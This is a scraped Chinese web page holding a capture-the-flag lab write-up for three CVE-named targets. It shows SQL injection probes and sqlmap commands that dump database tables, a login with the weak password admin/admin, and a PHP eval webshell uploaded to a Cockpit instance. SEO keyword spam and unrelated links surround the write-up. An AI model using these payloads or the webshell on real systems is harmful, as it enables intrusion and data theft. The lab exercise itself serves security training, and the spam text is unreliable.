当前位置: 首页 > news >正文

建设一个房产网站赚钱吗铜川做网站电话

建设一个房产网站赚钱吗,铜川做网站电话,服务器怎么添加网站,常州青竹网络做网站CVE-2023-2130 靶标介绍: 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。 通过标靶介绍可以知道…

CVE-2023-2130

靶标介绍:

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

通过标靶介绍可以知道在/admin/suppliers/view_details.php页面存在参数id有sql注入漏洞,访问该页面

当参数id=1' and 1=1 --+时正确,id=1' and 1=2 --+时错误,说明存在sql注入漏洞。

抓包,把请求信息保存到5.txt文件中,sqlmap梭哈

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D purchase_order_db --tables

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag -C flag --dump

得到flag

CVE-2023-1313

靶标介绍:

cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装

一个登录界面,他的提升通过/install来运行安装,访问/install,但是重定向到了原登录界面,dirsearch进行目录扫描,

 可以看到存在该目录,但是不能够访问,尝试弱口令登录

admin    /      admin

成功登录进去,

找上传页面

上传一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

上传成功后下载,浏览后得到上传目录

访问该路径

可以看到配置文件界面,说明上传成功,连接蚁剑

CVE-2023-0562

靶标介绍:

银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

存在mysqli扩展,有数据库,可能存在sql注入,寻找注入点

在这个地方搜索会进行POST传参,然后重定向到该页面

抓包测试

把抓包的内容放到5.txt文件中

searchinput=*    *会默认把该参数作为注入点

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D blmsdb --tables

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag -C flag --dump

http://www.sczhlp.com/news/58311/

相关文章:

  • 网站怎么算抄袭信阳做网站的
  • html5网站开发demo免费个人服务器
  • iNeuOS工业互联网操作系统,优惠活动
  • nano-banana model引导词
  • 建设干部培训中心网站网站的设计思想
  • 建筑企业资质查询网站wordpress自学网
  • 怎么创建卡密网站做网站都要买出口带宽吗
  • 莞城做网站公司延吉市建设厅网站
  • 东莞市住房建设网站中国重庆网站建设
  • 不同代码做的网站后期维护情况网站建设优化建议
  • 深圳企业专业网站设计网站产品介绍模板
  • 太仓市娄城高新建设有限公司网站会计专业的简历制作
  • 旅游网站开发代码宠物网站模版
  • 做网站网站盈利会怎么样黑龙江做网站的
  • h5视频网站模板上海外贸网站建设公司价格
  • 从零搭建AI应用:Coze还是Dify?看完这篇不再纠结
  • 规划数据库和数据管理系统
  • 营销网站怎么做合适免费图片素材高清
  • 网站开发的一般流程怎么查看网站跳出率
  • 怎样创建网站和网页网站不收录怎么办
  • 柳州网站推广直招招聘网
  • 如何建立企业网站或者官网网站开发属于什么软件
  • 好的网站制作网站台州seo排名扣费
  • 建设网站需要哪些流程图网站图片下载 代码
  • 大连网站推广价格网络营销五种方法
  • 华清远见嵌入式虚拟仿真实验教学平台及师资课程一体化建设方案
  • 事半功倍是蠢蛋49 pycharm设置头部模板 默认格式
  • windows安装gpu版本的lightgbm,并添加进python环境
  • Gitee DevSecOps平台:军工软件工业化转型的智能化引擎
  • 用AI提升测试效率:智能体平台的「需求文档管理」功能上线啦!